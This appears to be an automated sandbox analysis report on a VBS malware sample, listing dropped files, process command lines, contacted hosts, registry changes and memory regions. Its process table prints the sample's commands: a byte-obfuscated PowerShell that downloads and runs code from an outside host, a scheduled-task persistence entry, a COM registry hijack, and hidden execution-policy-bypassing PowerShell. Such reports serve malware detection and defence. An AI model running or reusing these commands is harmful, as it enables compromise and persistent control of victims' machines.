Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
H#0813-186765.vbs
|
ASCII text, with very long lines (12416), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Cloud\cloud.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (559), with no line terminators
|
dropped
|
|
|
|
C:\ProgramData\Cloud\cloud.ps1
|
ASCII text, with very long lines (65367), with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Cloud\cloud.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11usb23t.ohp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ewzzuiv.hfn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4evbrxr.oin.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dafxv52m.zn0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5jse2s5.1l3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxr2cyz2.zmn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3nhhcke.z1d.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kaqpw4b3.2it.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkjxnu32.lcr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2bbhmja.xlx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzc5rtge.ave.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncqmsvgz.3yq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oveb4o3y.cwl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ow1xlch2.vzs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppuaiuba.ibe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptamej2k.mcc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_py4gc11w.diw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmylc1al.ko2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjtzep3v.dg3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqwstpi2.i32.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sroubz4v.iqe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uilw2avl.qgm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgh5f4ew.mkm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkd2bsqr.xg0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlnicosd.hj5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whwd0lxn.g5j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyl45i2o.jsj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycx40qp0.g31.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yg1nf2g2.qgo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrtrlang.xgj.psm1
|
ASCII text, with no line terminators
|
dropped
|
There are 27 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[char]([byte]0x4e)+[char]([byte]0x65)+[char]([byte]0x77)+[char]([byte]0x2d)+[char]([byte]0x6f)+[char]([byte]0x62)+[char]([byte]0x6a)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x20)+[char]([byte]0x6e)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x77)+[char]([byte]0x65)+[char]([byte]0x62)+[char]([byte]0x63)+[char]([byte]0x6c)+[char]([byte]0x69)+[char]([byte]0x65)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x20)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x22)+[char]([byte]0x44)+[char]([byte]0x6f)+[char]([byte]0x77)+[char]([byte]0x6e)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x53)+[char]([byte]0x74)+[char]([byte]0x72)+[char]([byte]0x69)+[char]([byte]0x6e)+[char]([byte]0x67)+[char]([byte]0x22)+[char]([byte]0x20)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x54)+[char]([byte]0x79)+[char]([byte]0x70)+[char]([byte]0x65)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x4d)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x6f)+[char]([byte]0x64)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x22)+[char]([byte]0x68)+[char]([byte]0x74)+[char]([byte]0x74)+[char]([byte]0x70)+[char]([byte]0x73)+[char]([byte]0x3a)+[char]([byte]0x2f)+[char]([byte]0x2f)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x69)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x79)+[char]([byte]0x64)+[char]([byte]0x69)+[char]([byte]0x72)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x6f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x63)+[char]([byte]0x6f)+[char]([byte]0x6d)+[char]([byte]0x2f)+[char]([byte]0x72)+[char]([byte]0x65)+[char]([byte]0x64)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x2f)+[char]([byte]0x73)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x61)+[char]([byte]0x2e)+[char]([byte]0x67)+[char]([byte]0x69)+[char]([byte]0x66)+[char]([byte]0x22)+[char]([byte]0x20)+[char]([byte]0x29))
; $var2 = $([char]([byte]0x26)+[char]([byte]0x28)+[char]([byte]0x67)+[char]([byte]0x63)+[char]([byte]0x6d)+[char]([byte]0x20)+[char]([byte]0x69)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x6e)+[char]([byte]0x76)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x6f)+[char]([byte]0x6b)+[char]([byte]0x65)+[char]([byte]0x2d)+[char]([byte]0x65)+[char]([byte]0x78)+[char]([byte]0x70)+[char]([byte]0x72)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x29))
; $var3 = $var1+ ' | ' +$var2; $sb1 = [scriptblock]::Create($var3).Invoke()
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll
/f
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll
/f
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 10 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://varietydirectoutlet.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
https://go.micro/fwlink/?LinkId=
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://varietydirectoutlet.com/redro/sasa.gif
|
122.201.127.73
|
||
|
http://www.microsoft.coyZ
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
varietydirectoutlet.com
|
122.201.127.73
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
88.119.175.153
|
unknown
|
Lithuania
|
|
|
|
122.201.127.73
|
varietydirectoutlet.com
|
Australia
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
|
NULL
|
|
|
|
HKEY_CURRENT_USER_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
|
NULL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5190000
|
trusted library section
|
page read and write
|
|
|
|
3431000
|
trusted library allocation
|
page read and write
|
|
|
|
2C91000
|
trusted library allocation
|
page read and write
|
|
|
|
196F3321000
|
heap
|
page read and write
|
||
|
81330FE000
|
stack
|
page read and write
|
||
|
196F325C000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
183C000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
1CC102E2000
|
trusted library allocation
|
page read and write
|
||
|
8132CFF000
|
stack
|
page read and write
|
||
|
196F3314000
|
heap
|
page read and write
|
||
|
5E17000
|
trusted library allocation
|
page read and write
|
||
|
1CC6EBC0000
|
heap
|
page read and write
|
||
|
24CAC735000
|
heap
|
page read and write
|
||
|
2257AA08000
|
heap
|
page read and write
|
||
|
7F1D8000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC102A9000
|
trusted library allocation
|
page read and write
|
||
|
1F1F5DC0000
|
heap
|
page read and write
|
||
|
119C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6F37B000
|
heap
|
page read and write
|
||
|
6ED0000
|
heap
|
page read and write
|
||
|
1CC6CE30000
|
heap
|
page read and write
|
||
|
70D65F9000
|
stack
|
page read and write
|
||
|
1CC01389000
|
trusted library allocation
|
page read and write
|
||
|
2257A9D0000
|
heap
|
page read and write
|
||
|
5286000
|
heap
|
page read and write
|
||
|
2257A960000
|
heap
|
page read and write
|
||
|
31F7000
|
trusted library allocation
|
page execute and read and write
|
||
|
54C196A000
|
stack
|
page read and write
|
||
|
1CC6F2C1000
|
heap
|
page read and write
|
||
|
18F2000
|
heap
|
page read and write
|
||
|
5438000
|
trusted library allocation
|
page read and write
|
||
|
5B28000
|
heap
|
page read and write
|
||
|
1CC6E9D5000
|
heap
|
page read and write
|
||
|
24CAC710000
|
heap
|
page read and write
|
||
|
5966000
|
trusted library allocation
|
page execute and read and write
|
||
|
1150000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6F363000
|
heap
|
page read and write
|
||
|
351B000
|
trusted library allocation
|
page read and write
|
||
|
70D744C000
|
stack
|
page read and write
|
||
|
196F330A000
|
heap
|
page read and write
|
||
|
1B7C0D18000
|
heap
|
page read and write
|
||
|
24CAC770000
|
heap
|
page read and write
|
||
|
10FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
51D0000
|
trusted library allocation
|
page read and write
|
||
|
24CAE521000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
1F1F6095000
|
heap
|
page read and write
|
||
|
1CC6F19E000
|
heap
|
page read and write
|
||
|
1B7C0D4F000
|
heap
|
page read and write
|
||
|
5F80000
|
heap
|
page read and write
|
||
|
1CC6F651000
|
heap
|
page read and write
|
||
|
1CC6F008000
|
heap
|
page read and write
|
||
|
1160000
|
trusted library allocation
|
page read and write
|
||
|
1CC6CFED000
|
heap
|
page read and write
|
||
|
1640000
|
heap
|
page read and write
|
||
|
196F5083000
|
heap
|
page read and write
|
||
|
5950000
|
trusted library allocation
|
page read and write
|
||
|
4435000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0E7D000
|
heap
|
page read and write
|
||
|
24CAE52A000
|
heap
|
page read and write
|
||
|
14C18FF000
|
stack
|
page read and write
|
||
|
1B7C0C30000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
1CC102BF000
|
trusted library allocation
|
page read and write
|
||
|
2D192DD000
|
stack
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
1CC102CD000
|
trusted library allocation
|
page read and write
|
||
|
196F3307000
|
heap
|
page read and write
|
||
|
1D971630000
|
heap
|
page read and write
|
||
|
1D971460000
|
heap
|
page read and write
|
||
|
6360000
|
heap
|
page read and write
|
||
|
73AE000
|
stack
|
page read and write
|
||
|
1CC00085000
|
trusted library allocation
|
page read and write
|
||
|
1B7C2A51000
|
heap
|
page read and write
|
||
|
196F3313000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
196F5080000
|
heap
|
page read and write
|
||
|
C6977FD000
|
stack
|
page read and write
|
||
|
7A2E000
|
stack
|
page read and write
|
||
|
F88000
|
heap
|
page read and write
|
||
|
1B7C0E7C000
|
heap
|
page read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
1CC013B5000
|
trusted library allocation
|
page read and write
|
||
|
1CC6CFEF000
|
heap
|
page read and write
|
||
|
105F000
|
heap
|
page read and write
|
||
|
1605000
|
heap
|
page read and write
|
||
|
14C197F000
|
stack
|
page read and write
|
||
|
1B7C0D68000
|
heap
|
page read and write
|
||
|
1CC6F666000
|
heap
|
page read and write
|
||
|
6370000
|
heap
|
page read and write
|
||
|
1CC10071000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
trusted library section
|
page read and write
|
||
|
594E000
|
stack
|
page read and write
|
||
|
5200000
|
heap
|
page execute and read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
1B7C0D4F000
|
heap
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
1CC10312000
|
trusted library allocation
|
page read and write
|
||
|
1CC6EFA3000
|
heap
|
page read and write
|
||
|
6EBA000
|
heap
|
page read and write
|
||
|
54C1FFF000
|
stack
|
page read and write
|
||
|
3C95000
|
trusted library allocation
|
page read and write
|
||
|
1CC10310000
|
trusted library allocation
|
page read and write
|
||
|
5A40000
|
heap
|
page execute and read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
1CC1019F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
heap
|
page execute and read and write
|
||
|
7FF848CA2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D56000
|
trusted library allocation
|
page read and write
|
||
|
70D5F1E000
|
stack
|
page read and write
|
||
|
F8F758E000
|
stack
|
page read and write
|
||
|
C697AFB000
|
stack
|
page read and write
|
||
|
1B7C0BD0000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
24CAC895000
|
heap
|
page read and write
|
||
|
5A39000
|
trusted library allocation
|
page read and write
|
||
|
5210000
|
heap
|
page read and write
|
||
|
60DA0FE000
|
stack
|
page read and write
|
||
|
1B7C0D14000
|
heap
|
page read and write
|
||
|
196F330C000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
1CC10270000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0D66000
|
heap
|
page read and write
|
||
|
1CC6F36B000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
24CAC751000
|
heap
|
page read and write
|
||
|
1CC6CFAF000
|
heap
|
page read and write
|
||
|
5FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D971467000
|
heap
|
page read and write
|
||
|
1B7C0E7A000
|
heap
|
page read and write
|
||
|
1CC0043D000
|
trusted library allocation
|
page read and write
|
||
|
24CAC73D000
|
heap
|
page read and write
|
||
|
24CAE523000
|
heap
|
page read and write
|
||
|
1CC102FB000
|
trusted library allocation
|
page read and write
|
||
|
1CC6E9D0000
|
heap
|
page read and write
|
||
|
7FF848CFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7C2A61000
|
heap
|
page read and write
|
||
|
1B7C2A66000
|
heap
|
page read and write
|
||
|
1CC013B3000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0CFD000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
1CC6D1F5000
|
heap
|
page read and write
|
||
|
3317000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0D40000
|
heap
|
page read and write
|
||
|
1140000
|
trusted library allocation
|
page read and write
|
||
|
6AAE000
|
stack
|
page read and write
|
||
|
24CAC6C0000
|
heap
|
page read and write
|
||
|
1CC6F617000
|
heap
|
page read and write
|
||
|
24CAC89C000
|
heap
|
page read and write
|
||
|
24CAC710000
|
heap
|
page read and write
|
||
|
5A20000
|
trusted library allocation
|
page read and write
|
||
|
196F31E0000
|
heap
|
page read and write
|
||
|
1CC6CFC5000
|
heap
|
page read and write
|
||
|
1CC6F208000
|
heap
|
page read and write
|
||
|
24CAC5E0000
|
heap
|
page read and write
|
||
|
1CC6F34D000
|
heap
|
page read and write
|
||
|
1CC6F646000
|
heap
|
page read and write
|
||
|
712E000
|
stack
|
page read and write
|
||
|
2D1935F000
|
stack
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
1B7C0CFD000
|
heap
|
page read and write
|
||
|
1CC6CFAB000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
196F32DE000
|
heap
|
page read and write
|
||
|
31C4000
|
trusted library allocation
|
page read and write
|
||
|
24CAE525000
|
heap
|
page read and write
|
||
|
1B7C0CCE000
|
heap
|
page read and write
|
||
|
1839000
|
heap
|
page read and write
|
||
|
1CC102B5000
|
trusted library allocation
|
page read and write
|
||
|
1CC6F311000
|
heap
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
196F3306000
|
heap
|
page read and write
